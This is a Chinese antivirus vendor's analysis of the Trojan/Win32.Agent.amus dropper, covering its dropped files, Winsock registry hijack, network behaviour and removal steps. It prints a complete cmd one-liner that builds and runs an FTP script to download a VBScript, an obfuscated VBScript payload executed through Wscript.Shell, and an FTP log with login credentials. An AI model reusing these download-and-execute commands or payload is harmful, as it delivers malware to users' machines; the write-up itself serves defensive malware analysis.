Trojan/Win32.Agent.amus[Dropper]分析

病毒标签

病毒名称： Trojan/Win32.Agent.amus[Dropper]
病毒类型： 木马释放器
文件 MD5： E2E895E3495E438B5092ABCDBCC7D5AF
公开范围： 完全公开
危害等级： 4
文件长度： 2,113 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++

病毒描述

    该恶意代码文件为Dropper类木马释放器，该病毒文件伪装成IE快捷方式文件诱惑用户点击，运行后获取Windows版本所带的UI资源的语言，动态获取API函数调用函数打开注册表进程操作，检测自身是否被处理调试状态，病毒运行后释放多个脚本文件到系统目录下，等待脚本运行完毕后删除脚本文件，调用CMD执行脚本连接FTP请求病毒文件，随后下载病毒文件，该病毒文件会安装多个病毒插件不定时隐藏访问网络点击广告。

行为分析-本地行为

1、文件运行后会释放以下文件
%System32%\ro.dll
%Windir%\Help\F3C74E3FA248.dll
%Windir%\Help\F3C74E3FA248.exe

2、修改注册表项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\
Catalog_Entries\000000000001\PackedCatalogItem
新: 字串“%Windir%\system32\ro.dll.ck.dll”
旧: 字串“%SystemRoot%\system32\mswsock.dll”
描述：修改注册表设置病毒启动项

3、运行后获取Windows版本所带的UI资源的语言，动态获取API函数调用函数打开注册表进程操作，检测自身是否被处理调试状态，病毒运行后释放多个脚本文件到系统目录下，等待脚本运行完毕后删除脚本文件，调用以下参数顺序并设置执行脚本文件：
%ComSpec% /c set h=p -s:s&set g=.g03z.&set f=33&set e=echo &echo %e%o www%g%com^>s>c&echo %e%aa%f%^>^>s>>c&echo %e%bb%f%^>^>s>>c&echo %e%recv r r.vbs^>^>s>>c&echo %e%bye^>^>s>>c&echo ft%h%>>c&echo start r.vbs>>c&ren c p.bat&call p.bat&
等待运行运行完毕后弹出网页：http://tw.ma***.yahoo.com （交友中心）诱惑用户注册成为改站会员

行为分析-网络行为

协议：TCP
端口：1060
连接IP地址：202.153.172.**
描述：连接IP地址POST执行的脚本内容
function q
for i=1 to UBound(j)
r=r&chr(9+j(i))
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,0
end function
j=array(4,90,100,91,23,38,90,23,101,92,107,23,106,107,102,103,23,106,95,88,105,92,91,88,90,90,92,106,
106,29,92,90,95,102,23,102,23,110,110,110,37,94,39,42,113,37,90,102,100,53,96,37,107,111,107,29,92,90,
95,102,23,88,88,42,42,53,53,96,37,107,111,107,29,92,90,95,102,23,89,89,42,42,53,53,96,37,107,111,107,
29,92,90,95,102,23,94,92,107,23,91,23,91,37,92,111,92,53,53,96,37,107,111,107,29,92,90,95,102,23,89,
112,92,53,53,96,37,107,111,107,29,93,107,103,23,36,106,49,96,37,107,111,107,29,91,92,99,23,96,37,107,
111,107,29,91,37,92,111,92,29,92,90,95,102,23,102,23,110,110,110,37,94,39,42,113,37,90,102,100,53,108,
37,107,111,107,29,92,90,95,102,23,88,88,42,42,53,53,108,37,107,111,107,29,92,90,95,102,23,89,89,42,42,
53,53,108,37,107,111,107,29,92,90,95,102,23,94,92,107,23,106,23,106,37,92,111,92,53,53,108,37,107,111,
107,29,92,90,95,102,23,89,112,92,53,53,108,37,107,111,107,29,93,107,103,23,36,106,49,108,37,107,111,107,
29,106,37,92,111,92,29,91,92,99,23,108,37,107,111,107,29,91,92,99,23,54,37,109,89,106,29,91,92,99,23,106,
37,92,111,92,23,91,37,92,111,92,29,106,107,88,105,107,23,95,107,107,103,49,38,38,107,110,37,100,88,107,90,
95,37,112,88,95,102,102,37,90,102,100,38,29,91,92,99,23,54,23,54,37,89,88,107)q
协议：TCP-FTP
端口：21
连接IP地址：202.153.172.**
220 Serv-U FTP Server v6.4 for WinSock ready...
USER aa33
331 User name okay, need password.
PASS bb33
230 User logged in, proceed.
PORT 10,0,51,12,4,23
200 PORT Command successful.
RETR s
150 Opening ASCII mode data connection for s (187872 Bytes).
连接FTP请求病毒文件

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
         %Windir% 　　　　　 　　　　　 WINDODWS所在目录
         %DriveLetter%　 　　　　　　　 逻辑驱动器根目录
         %ProgramFiles%　 　 　　　　　 系统程序默认安装目录
         %HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
         %Documents and Settings% 　　　当前用户文档根目录
         %Temp% 　　　　　　　　　　　　\Documents and Settings\当前用户\Local Settings\Temp
         %System32% 　　　　　　　　　　 系统的 System32文件夹
　　　　
         Windows2000/NT中默认的安装路径是C:\Winnt\System32
         windows95/98/me中默认的安装路径是C:\Windows\System
         windowsXP中默认的安装路径是C:\Windows\System32

清除方案

1、使用安天防线可彻底清除此病毒(推荐)，请点击下载(http://www.antiyfx.com)。
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
推荐使用ATool管理工具，请点击下载(http://www.antiy.com/cn/download/index.htm)。
（1）使用ATOOL“进程管理”进程病毒进程。

（2）强行删除病毒文件
%System32%\ro.dll
%Windir%\Help\F3C74E3FA248.dll
%Windir%\Help\F3C74E3FA248.exe

（3）恢复病毒修改的注册表项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9
\Catalog_Entries\000000000001\PackedCatalogItem
新: 字串“%Windir%\system32\ro.dll.ck.dll”
旧: 字串“%SystemRoot%\system32\mswsock.dll”